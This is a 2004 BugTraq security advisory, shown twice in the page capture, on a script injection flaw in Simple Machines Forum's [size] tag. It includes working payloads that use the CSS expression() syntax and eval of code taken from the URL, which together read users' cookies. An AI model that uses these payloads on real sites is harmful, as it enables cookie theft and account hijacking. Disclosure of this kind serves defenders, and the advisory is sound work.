BugTraq
Back to list
|
Post reply
SMF SIZE Tag Script Injection Vulnerability
May 05 2004 12:28PM
Cheng Peng Su (apple_soup msn com)
########################################################################
####
Advisory Name : SMF SIZE Tag Script Injection Vulnerability
Release Date : May 3,2004
Application : Simple Machines
Test On : SMF 1.0 Beta 5 Public
Vendor URL : http://www.simplemachines.org/
Discover : Cheng Peng Su(apple_soup_at_msn.com)
########################################################################
####
Intro:
The team that has brought you YaBB SE has moved on to develop
the next evolution in forum software, Simple Machines Forum(SMF).
They have rebranded themselves under the name Simple Machines.They
said proudly that "SMF is a next-generation community software package
and is jam-packed with features, while at the same time having a minimal
impact on resources."
Proof of conecpt:
SMF doesn't filter scripting code strictly in the [size] tags,
in other words,they forget to filter ()+ characters.Attacker can use
the expression() syntax to set an malicious expression on font-size
attribute.The code below is available.
[size=expression(alert(document.cookie))]Just beginning[/size]
but if you start complex code,you will know that some characters
(such as quote,apostrophe and semicolon) are filtered by SMF, but
I found an available way without quote,apostrophe or semicolon, you
will know this way from the Exploit below.
Exploit:
First,submit specially content like below
[size=expression(eval(unescape(document.URL.substring(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]
'41' in the content means the length of the malicious scripting.
If the URL of the Topic above is
http://site/index.php?topic=12345.0
Make a link with malicious scripting like this:
http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.
cookie)
Solution:
SMF were notified and there may will be a release of a fix or update
to resolve these issues. Who knows, maybe they don't care this' bug.
Contact:
apple_soup_at_msn.com
Cheng Peng Su
Class 1,Senior 2, High school attached to Wuhan University
Wuhan,Hubei,China(430072)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
########################################################################
####
Advisory Name : SMF SIZE Tag Script Injection Vulnerability
Release Date : May 3,2004
Application : Simple Machines
Test On : SMF 1.0 Beta 5 Public
Vendor URL : http://www.simplemachines.org/
Discover : Cheng Peng Su(apple_soup_at_msn.com)
########################################################################
####
Intro:
The team that has brought you YaBB SE has moved on to develop
the next evolution in forum software, Simple Machines Forum(SMF).
They have rebranded themselves under the name Simple Machines.They
said proudly that "SMF is a next-generation community software package
and is jam-packed with features, while at the same time having a minimal
impact on resources."
Proof of conecpt:
SMF doesn't filter scripting code strictly in the [size] tags,
in other words,they forget to filter ()+ characters.Attacker can use
the expression() syntax to set an malicious expression on font-size
attribute.The code below is available.
[size=expression(alert(document.cookie))]Just beginning[/size]
but if you start complex code,you will know that some characters
(such as quote,apostrophe and semicolon) are filtered by SMF, but
I found an available way without quote,apostrophe or semicolon, you
will know this way from the Exploit below.
Exploit:
First,submit specially content like below
[size=expression(eval(unescape(document.URL.substring(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]
'41' in the content means the length of the malicious scripting.
If the URL of the Topic above is
http://site/index.php?topic=12345.0
Make a link with malicious scripting like this:
http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.
cookie)
Solution:
SMF were notified and there may will be a release of a fix or update
to resolve these issues. Who knows, maybe they don't care this' bug.
Contact:
apple_soup_at_msn.com
Cheng Peng Su
Class 1,Senior 2, High school attached to Wuhan University
Wuhan,Hubei,China(430072)
[ reply ]